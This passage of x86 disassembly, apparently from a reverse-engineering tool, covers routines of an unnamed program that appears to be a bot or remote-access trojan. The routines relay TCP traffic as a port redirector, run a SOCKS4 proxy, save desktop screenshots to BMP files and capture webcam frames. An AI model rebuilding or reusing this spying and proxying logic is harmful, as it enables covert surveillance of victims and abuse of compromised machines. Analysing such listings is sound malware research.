pop ecx
lea edi, [ebp+Parameter]
rep movsd
mov ebx, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6 ; protocol
push ecx ; type
push 2 ; af
mov [eax+120h], ecx
mov [ebp+var_4], ebx
call socket_0
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+s], esi
jz loc_408821
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+var_18], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
mov [ebp+var_16], ax
lea eax, [ebp+name]
push eax ; cp
call inet_addr_0
cmp eax, 0FFFFFFFFh
mov dword ptr [ebp+addr], eax
jnz short loc_40874E
lea eax, [ebp+name]
push eax ; name
call gethostbyname ; gethostbyname
jmp short loc_40875C
; ---------------------------------------------------------------------------
loc_40874E: ; CODE XREF: sub_4086BE+7F�j
push 2 ; type
lea eax, [ebp+addr]
push 4 ; len
push eax ; addr
call gethostbyaddr ; gethostbyaddr
loc_40875C: ; CODE XREF: sub_4086BE+8E�j
cmp eax, edi
jz loc_408821
mov eax, [eax+0Ch]
push 10h ; namelen
mov eax, [eax]
mov eax, [eax]
mov dword ptr [ebp+in.S_un], eax
lea eax, [ebp+var_18]
push eax ; name
push esi ; s
call connect_0
cmp eax, 0FFFFFFFFh
jz loc_408821
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push dword ptr [ebp+in.S_un] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_344]
push 42BEF0h
push eax
call sub_41795B
push esi
lea eax, [ebp+var_344]
push 12h
push eax
call sub_41741F
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, [ebx+44B874h]
mov [eax+44B86Ch], ecx
add esp, 20h
mov ecx, [esi]
mov [eax+44B878h], ecx
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push edi ; dwCreationFlags
push eax ; lpParameter
push offset sub_4088A6 ; lpStartAddress
push edi ; dwStackSize
push edi ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov [ecx+44B87Ch], eax
jnz short loc_40885A
call GetLastError
push eax
push 42BEA0h
call sub_40CB7C
pop ecx
pop ecx
loc_408821: ; CODE XREF: sub_4086BE+44�j
; sub_4086BE+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword ptr [eax+44B874h] ; s
call closesocket_0
push [ebp+s] ; s
call closesocket_0
push [ebp+var_4]
call sub_417735
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
loc_408852: ; CODE XREF: sub_4086BE+19F�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_40885A: ; CODE XREF: sub_4086BE+14E�j
cmp [ebp+var_20], edi
jz short loc_408852
mov ebx, 1000h
loc_408864: ; CODE XREF: sub_4086BE+1E1�j
push ebx
lea eax, [ebp+buf]
push edi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+buf]
push edi ; flags
push ebx ; len
push eax ; buf
push dword ptr [esi] ; s
call recv_0
cmp eax, edi
jle short loc_408821
push edi ; flags
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
cmp eax, 0FFFFFFFFh
jnz short loc_408864
jmp loc_408821
sub_4086BE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4088A6(LPVOID)
sub_4088A6 proc near ; DATA XREF: sub_4086BE+130�o
buf = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_417F30
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_4088DD: ; CODE XREF: sub_4088A6+7C�j
push edi
lea eax, [ebp+buf]
push 0
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+buf]
push 0 ; flags
push edi ; len
push eax ; buf
push dword ptr [esi+44B878h] ; s
call recv_0
test eax, eax
jle short loc_408924
push 0 ; flags
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push dword ptr [esi+44B874h] ; s
call send_0
cmp eax, 0FFFFFFFFh
jnz short loc_4088DD
loc_408924: ; CODE XREF: sub_4088A6+61�j
push dword ptr [esi+44B878h] ; s
call closesocket_0
push [ebp+var_14]
call sub_417735
pop ecx
push 0 ; dwExitCode
call ExitThread ; ExitThread
sub_4088A6 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_408943(LPVOID)
sub_408943 proc near ; DATA XREF: sub_40FCA3+5FCF�o
var_2D4 = dword ptr -2D4h
Parameter = dword ptr -0D4h
var_D0 = dword ptr -0D0h
hostshort = word ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
addr = sockaddr ptr -24h
name = sockaddr ptr -14h
addrlen = dword ptr -4
ThreadId = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+ThreadId]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+Parameter]
push 2Ch
mov [ebp+addrlen], ebx
pop ecx
rep movsd
xor edi, edi
xor esi, esi
inc edi
push ebx
mov [eax+0A8h], edi
lea eax, [ebp+name]
push esi
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
push 6 ; protocol
push edi ; type
push 2 ; af
mov word ptr [ebp+name.sa_data], ax
mov dword ptr [ebp+name.sa_data+2], esi
call socket_0
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx ; namelen
mov [eax+44B874h], edi
lea eax, [ebp+name]
push eax ; name
push edi ; s
call bind_0
test eax, eax
jnz loc_408AE4
push 0Ah ; backlog
push edi ; s
call listen_0
test eax, eax
jnz loc_408AE4
push dword ptr [ebp+hostshort]
push [ebp+Parameter] ; s
call sub_40B972
pop ecx
push eax
lea eax, [ebp+var_2D4]
push 42C024h
push eax
call sub_41795B
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_408A1E
push esi ; int
lea eax, [ebp+var_2D4]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+var_D0]
push eax ; int
push [ebp+Parameter] ; s
call sub_40E1D6
add esp, 14h
loc_408A1E: ; CODE XREF: sub_408943+B9�j
; sub_408943+18A�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_40CB08
pop ecx
lea eax, [ebp+addrlen]
push eax ; addrlen
lea eax, [ebp+addr]
push eax ; addr
push edi ; s
call accept_0
push [ebp+var_3C]
mov ebx, eax
movzx eax, word ptr [ebp+addr.sa_data]
push eax
mov [ebp+var_28], esi
push dword ptr [ebp+addr.sa_data+2] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_2D4]
push 42BFD0h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2D4]
push 13h
push eax
call sub_41741F
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov [eax+44B86Ch], ecx
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push esi ; dwCreationFlags
push eax ; lpParameter
push offset sub_408B47 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov [ecx+44B87Ch], eax
jnz short loc_408ADA
call GetLastError
push eax
lea eax, [ebp+var_2D4]
push 42BF88h
push eax
call sub_41795B
add esp, 0Ch
jmp loc_408A1E
; ---------------------------------------------------------------------------
loc_408AD2: ; CODE XREF: sub_408943+19A�j
push 5 ; dwMilliseconds
call Sleep ; Sleep
loc_408ADA: ; CODE XREF: sub_408943+16D�j
cmp [ebp+var_28], esi
jz short loc_408AD2
jmp loc_408A1E
; ---------------------------------------------------------------------------
loc_408AE4: ; CODE XREF: sub_408943+7B�j
; sub_408943+8C�j
push edi ; s
call closesocket_0
push dword ptr [ebp+hostshort]
lea eax, [ebp+var_2D4]
push 42BF44h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_408B27
push esi ; int
lea eax, [ebp+var_2D4]
push [ebp+var_34] ; int
push eax ; int
lea eax, [ebp+var_D0]
push eax ; int
push [ebp+Parameter] ; s
call sub_40E1D6
add esp, 14h
loc_408B27: ; CODE XREF: sub_408943+1C2�j
lea eax, [ebp+var_2D4]
push eax
call sub_40CB08
push [ebp+var_3C]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_408943 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_408B47(LPVOID)
sub_408B47 proc near ; DATA XREF: sub_408943+14F�o
readfds = fd_set ptr -5D4h
buf = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
name = sockaddr ptr -18h
timeout = timeval ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
xor edi, edi
mov [ebp+arg_0], esi
imul esi, 234h
inc edi
lea esi, [esi+44B874h]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+timeout.tv_sec], 5
mov [ebp+readfds.fd_array], eax
lea eax, [ebp+timeout]
push eax ; timeout
push ebx ; exceptfds
lea eax, [ebp+readfds]
push ebx ; writefds
push eax ; readfds
push ebx ; nfds
mov [ebp+timeout.tv_usec], ebx
mov [ebp+readfds.fd_count], edi
call select_0
test eax, eax
jnz short loc_408BC8
push dword ptr [esi] ; s
call closesocket_0
push [ebp+arg_0]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_408BC8: ; CODE XREF: sub_408B47+67�j
push ebx ; flags
lea eax, [ebp+buf]
push 408h ; len
push eax ; buf
push dword ptr [esi] ; s
call recv_0
test eax, eax
jg short loc_408BF9
push dword ptr [esi] ; s
call closesocket_0
push [ebp+arg_0]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_408BF9: ; CODE XREF: sub_408B47+98�j
cmp [ebp+buf], 4
jnz loc_408DF3
cmp [ebp+var_4CF], 1
jnz loc_408DF3
cmp [ebp+var_44], bl
jz short loc_408C8F
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_408C8F
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push 42C100h
call sub_40CB7C
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+buf], bl
mov [ebp+var_4CF], 5Dh
call sub_4179E0
add esp, 18h
lea eax, [ebp+buf]
push ebx ; flags
push 8 ; len
push eax ; buf
push dword ptr [esi] ; s
call send_0
push dword ptr [esi] ; s
call closesocket_0
push [ebp+arg_0]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_408C8F: ; CODE XREF: sub_408B47+CF�j
; sub_408B47+E5�j
push 10h
lea eax, [ebp+name]
push ebx
push eax
call sub_4179E0
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov word ptr [ebp+name.sa_data], ax
mov eax, [ebp+var_4CC]
push 6 ; protocol
push edi ; type
push 2 ; af
mov [ebp+name.sa_family], 2
mov dword ptr [ebp+name.sa_data+2], eax
call socket_0
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_408D27
call WSAGetLastError ; WSAGetLastError
push eax
push 42C0B0h
call sub_40CB7C
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+buf], bl
mov [ebp+var_4CF], 5Bh
call sub_4179E0
add esp, 14h
lea eax, [ebp+buf]
push ebx ; flags
push 8 ; len
push eax ; buf
push dword ptr [esi] ; s
call send_0
push dword ptr [esi] ; s
call closesocket_0
push [ebp+arg_0]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_408D27: ; CODE XREF: sub_408B47+181�j
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
call connect_0
cmp eax, 0FFFFFFFFh
jnz short loc_408D96
call WSAGetLastError ; WSAGetLastError
push eax
push 42C060h
call sub_40CB7C
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+buf], bl
mov [ebp+var_4CF], 5Bh
call sub_4179E0
add esp, 14h
lea eax, [ebp+buf]
push ebx ; flags
push 8 ; len
push eax ; buf
push dword ptr [esi] ; s
call send_0
push dword ptr [esi] ; s
call closesocket_0
push [ebp+arg_0]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_408D96: ; CODE XREF: sub_408B47+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+buf], bl
mov [ebp+var_4CF], 5Ah
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+buf]
push ebx ; flags
push 8 ; len
push eax ; buf
push dword ptr [esi] ; s
call send_0
push dword ptr [esi] ; s
push edi ; fd
call sub_408E0B
pop ecx
pop ecx
push edi ; s
call closesocket_0
push dword ptr [esi] ; s
call closesocket_0
push [ebp+arg_0]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_408DF3: ; CODE XREF: sub_408B47+B9�j
; sub_408B47+C6�j
push dword ptr [esi] ; s
call closesocket_0
push [ebp+arg_0]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_408B47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408E0B(SOCKET fd, SOCKET s)
sub_408E0B proc near ; CODE XREF: sub_408B47+286�p
buf = byte ptr -504h
readfds = fd_set ptr -104h
fd = dword ptr 8
s = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+s]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_408E21: ; CODE XREF: sub_408E0B+BE�j
; sub_408E0B+EE�j
xor ecx, ecx
mov [ebp+readfds.fd_array], ebx
inc ecx
xor eax, eax
mov [ebp+readfds.fd_count], ecx
loc_408E32: ; CODE XREF: sub_408E0B+36�j
mov edx, [ebp+fd]
cmp [ebp+eax*4+readfds.fd_array], edx
jz short loc_408E43
inc eax
cmp eax, ecx
jb short loc_408E32
loc_408E43: ; CODE XREF: sub_408E0B+31�j
cmp eax, ecx
jnz short loc_408E57
mov [ebp+readfds.fd_array+4], edx
mov [ebp+readfds.fd_count], 2
loc_408E57: ; CODE XREF: sub_408E0B+3A�j
push esi
lea eax, [ebp+buf]
push edi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+readfds]
push edi ; timeout
push edi ; exceptfds
push edi ; writefds
push eax ; readfds
push edi ; nfds
call select_0
lea eax, [ebp+readfds]
push eax ; fd_set *
push ebx ; fd
call __WSAFDIsSet_0
test eax, eax
jz short loc_408EB7
push edi ; flags
lea eax, [ebp+buf]
push esi ; len
push eax ; buf
push ebx ; s
call recv_0
cmp eax, 0FFFFFFFFh
jz short loc_408EFF
push edi ; flags
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+fd] ; s
call send_0
cmp eax, 0FFFFFFFFh
jz short loc_408EFF
loc_408EB7: ; CODE XREF: sub_408E0B+7E�j
lea eax, [ebp+readfds]
push eax ; fd_set *
push [ebp+fd] ; fd
call __WSAFDIsSet_0
test eax, eax
jz loc_408E21
push edi ; flags
lea eax, [ebp+buf]
push esi ; len
push eax ; buf
push [ebp+fd] ; s
call recv_0
cmp eax, 0FFFFFFFFh
jz short loc_408EFF
push edi ; flags
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push ebx ; s
call send_0
cmp eax, 0FFFFFFFFh
jnz loc_408E21
loc_408EFF: ; CODE XREF: sub_408E0B+93�j
; sub_408E0B+AA�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_408E0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408F04(HANDLE hFile)
sub_408F04 proc near ; CODE XREF: sub_40FCA3+4685�p
prgbq = RGBQUAD ptr -484h
bmi = BITMAPINFO ptr -84h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Buffer = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
ho = dword ptr -1Ch
lpBuffer = dword ptr -18h
NumberOfBytesWritten= dword ptr -14h
var_10 = dword ptr -10h
cy = dword ptr -0Ch
nNumberOfBytesToWrite= dword ptr -8
hdc = dword ptr -4
hFile = dword ptr 8
push ebp
mov ebp, esp
sub esp, 484h
push ebx
push esi
xor esi, esi
push edi
push esi ; pdm
push esi ; pszPort
push esi ; pwszDevice
push offset pwszDriver ; pwszDriver
call CreateDCA ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+var_20], edi
jz loc_409138
push 8 ; index
push edi ; hdc
call GetDeviceCaps ; GetDeviceCaps
push 0Ah ; index
push edi ; hdc
mov [ebp+nNumberOfBytesToWrite], eax
call GetDeviceCaps ; GetDeviceCaps
push 0Ch ; index
push edi ; hdc
mov [ebp+cy], eax
call GetDeviceCaps ; GetDeviceCaps
cmp eax, 8
mov [ebp+var_10], eax
ja short loc_408F66
push 18h ; index
push edi ; hdc
call GetDeviceCaps ; GetDeviceCaps
mov ebx, 100h
jmp short loc_408F68
; ---------------------------------------------------------------------------
loc_408F66: ; CODE XREF: sub_408F04+50�j
xor ebx, ebx
loc_408F68: ; CODE XREF: sub_408F04+60�j
push edi ; hdc
call CreateCompatibleDC ; CreateCompatibleDC
cmp eax, esi
mov [ebp+hdc], eax
jz loc_40911D
mov eax, [ebp+nNumberOfBytesToWrite]
push esi ; offset
mov [ebp+bmi.bmiHeader.biWidth], eax
mov eax, [ebp+cy]
mov [ebp+bmi.bmiHeader.biHeight], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+bmi.bmiHeader.biBitCount], ax
lea eax, [ebp+lpBuffer]
push esi ; hSection
push eax ; ppvBits
lea eax, [ebp+bmi]
push 1 ; usage
push eax ; lpbmi
push edi ; hdc
mov [ebp+bmi.bmiHeader.biSize], 28h
mov [ebp+bmi.bmiHeader.biPlanes], 1
mov [ebp+bmi.bmiHeader.biCompression], esi
mov [ebp+bmi.bmiHeader.biSizeImage], esi
mov [ebp+bmi.bmiHeader.biXPelsPerMeter], esi
mov [ebp+bmi.bmiHeader.biYPelsPerMeter], esi
mov [ebp+bmi.bmiHeader.biClrUsed], ebx
mov [ebp+bmi.bmiHeader.biClrImportant], ebx
call CreateDIBSection ; CreateDIBSection
cmp eax, esi
mov [ebp+ho], eax
jz loc_409128
push eax ; h
push [ebp+hdc] ; hdc
call SelectObject ; SelectObject
cmp eax, esi
jz loc_409128
cmp eax, 0FFFFFFFFh
jz loc_409128
push 0CC0020h ; rop
push esi ; y1
push esi ; x1
push edi ; hdcSrc
push [ebp+cy] ; cy
push [ebp+nNumberOfBytesToWrite] ; cx
push esi ; y
push esi ; x
push [ebp+hdc] ; hdc
call BitBlt ; BitBlt
test eax, eax
jz loc_409128
cmp ebx, esi
jz short loc_409025
lea eax, [ebp+prgbq]
push eax ; prgbq
push ebx ; cEntries
push esi ; iStart
push [ebp+hdc] ; hdc
call GetDIBColorTable ; GetDIBColorTable
mov ebx, eax
loc_409025: ; CODE XREF: sub_408F04+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+nNumberOfBytesToWrite]
imul edi, [ebp+cy]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+nNumberOfBytesToWrite], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+cy]
push esi
push esi
push 40000000h
push [ebp+hFile]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+Buffer], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call dword ptr byte_424084
cmp eax, 0FFFFFFFFh
mov [ebp+hFile], eax
jz short loc_409108
lea ecx, [ebp+NumberOfBytesWritten]
push esi ; lpOverlapped
push ecx ; lpNumberOfBytesWritten
lea ecx, [ebp+Buffer]
push 0Eh ; nNumberOfBytesToWrite
push ecx ; lpBuffer
push eax ; hFile
call WriteFile ; WriteFile
lea eax, [ebp+NumberOfBytesWritten]
push esi ; lpOverlapped
push eax ; lpNumberOfBytesWritten
lea eax, [ebp+var_58]
push 28h ; nNumberOfBytesToWrite
push eax ; lpBuffer
push [ebp+hFile] ; hFile
call WriteFile ; WriteFile
cmp ebx, esi
jz short loc_4090EA
lea eax, [ebp+NumberOfBytesWritten]
push esi ; lpOverlapped
push eax ; lpNumberOfBytesWritten
lea eax, [ebp+prgbq]
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push eax ; lpBuffer
push [ebp+hFile] ; hFile
call WriteFile ; WriteFile
loc_4090EA: ; CODE XREF: sub_408F04+1CC�j
lea eax, [ebp+NumberOfBytesWritten]
push esi ; lpOverlapped
push eax ; lpNumberOfBytesWritten
push edi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hFile] ; hFile
call WriteFile ; WriteFile
push [ebp+hFile]
call dword ptr byte_424074+4
xor esi, esi
inc esi
loc_409108: ; CODE XREF: sub_408F04+1A2�j
push [ebp+ho] ; ho
call DeleteObject ; DeleteObject
push [ebp+hdc] ; hdc
call DeleteDC ; DeleteDC
mov edi, [ebp+var_20]
loc_40911D: ; CODE XREF: sub_408F04+70�j
push edi ; hdc
call DeleteDC ; DeleteDC
mov eax, esi
jmp short loc_40913A
; ---------------------------------------------------------------------------
loc_409128: ; CODE XREF: sub_408F04+C7�j
; sub_408F04+D9�j ...
push edi ; hdc
call DeleteDC ; DeleteDC
push [ebp+hdc] ; hdc
call DeleteDC ; DeleteDC
loc_409138: ; CODE XREF: sub_408F04+23�j
xor eax, eax
loc_40913A: ; CODE XREF: sub_408F04+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_408F04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40913F(int, WPARAM wParam, int, int)
sub_40913F proc near ; CODE XREF: sub_40FCA3+47C1�p
lParam = dword ptr -34h
var_20 = dword ptr -20h
lpMem = dword ptr -8
hWnd = dword ptr -4
arg_0 = dword ptr 8
wParam = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
xor esi, esi
push edi
inc esi
xor ebx, ebx
push esi
push dword ptr unk_4448C4
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push 42C154h
call capCreateCaptureWindowA
mov edi, eax
cmp edi, ebx
mov [ebp+hWnd], edi
jnz short loc_40917D
mov eax, esi
jmp loc_409333
; ---------------------------------------------------------------------------
loc_40917D: ; CODE XREF: sub_40913F+35�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_40919A
push ebx ; lParam
push [ebp+wParam] ; wParam
push 40Ah ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
jmp short loc_40919C
; ---------------------------------------------------------------------------
loc_40919A: ; CODE XREF: sub_40913F+47�j
xor eax, eax
loc_40919C: ; CODE XREF: sub_40913F+59�j
cmp eax, ebx
jnz short loc_4091A7
loc_4091A0: ; CODE XREF: sub_40913F+88�j
; sub_40913F+BC�j
mov ebx, esi
jmp loc_409328
; ---------------------------------------------------------------------------
loc_4091A7: ; CODE XREF: sub_40913F+5F�j
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_4091C4
lea eax, [ebp+lParam]
push eax ; lParam
push 2Ch ; wParam
push 40Eh ; Msg
push edi ; hWnd
call SendMessageA ; SendMessageA
loc_4091C4: ; CODE XREF: sub_40913F+71�j
cmp [ebp+var_20], ebx
jz short loc_4091A0
push edi ; hWnd
call IsWindow ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_4091EA
push ebx ; lParam
push ebx ; wParam
push edi ; Msg
push [ebp+hWnd] ; hWnd
call SendMessageA ; SendMessageA
mov [ebp+wParam], eax
jmp short loc_4091ED
; ---------------------------------------------------------------------------
loc_4091EA: ; CODE XREF: sub_40913F+98�j
mov [ebp+wParam], ebx
loc_4091ED: ; CODE XREF: sub_40913F+A9�j
push [ebp+wParam]
call sub_418175
cmp eax, ebx
pop ecx
mov [ebp+lpMem], eax
jz short loc_4091A0
push [ebp+wParam]
call sub_418175
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_409214
xor ebx, ebx
inc ebx
jmp loc_409328
; ---------------------------------------------------------------------------
loc_409214: ; CODE XREF: sub_40913F+CB�j
push [ebp+hWnd] ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_409231
push [ebp+lpMem] ; lParam
push [ebp+wParam] ; wParam
push edi ; Msg
push [ebp+hWnd] ; hWnd
call SendMessageA ; SendMessageA
loc_409231: ; CODE XREF: sub_40913F+E0�j
push [ebp+wParam]
push [ebp+lpMem]
push esi
call sub_417A40
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_40924C
mov ecx, 280h
loc_40924C: ; CODE XREF: sub_40913F+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_409258
mov eax, 1E0h
loc_409258: ; CODE XREF: sub_40913F+112�j
push [ebp+hWnd] ; hWnd
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call IsWindow ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_4092A2
push esi ; lParam
push [ebp+wParam] ; wParam
push edi ; Msg
push [ebp+hWnd] ; hWnd
call SendMessageA ; SendMessageA
loc_4092A2: ; CODE XREF: sub_40913F+153�j
push [ebp+hWnd] ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_4092BF
push ebx ; lParam
push ebx ; wParam
push 43Dh ; Msg
push [ebp+hWnd] ; hWnd
call SendMessageA ; SendMessageA
loc_4092BF: ; CODE XREF: sub_40913F+16E�j
push [ebp+hWnd] ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_4092DE
push [ebp+arg_0] ; lParam
push ebx ; wParam
push 419h ; Msg
push [ebp+hWnd] ; hWnd
call SendMessageA ; SendMessageA
loc_4092DE: ; CODE XREF: sub_40913F+18B�j
push [ebp+hWnd] ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_4092FB
push [ebp+lpMem] ; lParam
push [ebp+wParam] ; wParam
push edi ; Msg
push [ebp+hWnd] ; hWnd
call SendMessageA ; SendMessageA
loc_4092FB: ; CODE XREF: sub_40913F+1AA�j
push [ebp+lpMem] ; lpMem
call sub_418227
push esi ; lpMem
call sub_418227
pop ecx
pop ecx
push [ebp+hWnd] ; hWnd
call IsWindow ; IsWindow
test eax, eax
jz short loc_409328
push ebx ; lParam
push ebx ; wParam
push 40Bh ; Msg
push [ebp+hWnd] ; hWnd
call SendMessageA ; SendMessageA
loc_409328: ; CODE XREF: sub_40913F+63�j
; sub_40913F+D0�j ...
push [ebp+hWnd] ; hWnd
call DestroyWindow ; DestroyWindow
mov eax, ebx
loc_409333: ; CODE XREF: sub_40913F+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_40913F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409338(int, WPARAM wParam, int, int, int)
sub_409338 proc near ; CODE XREF: sub_40FCA3+487E�p
lParam = dword ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
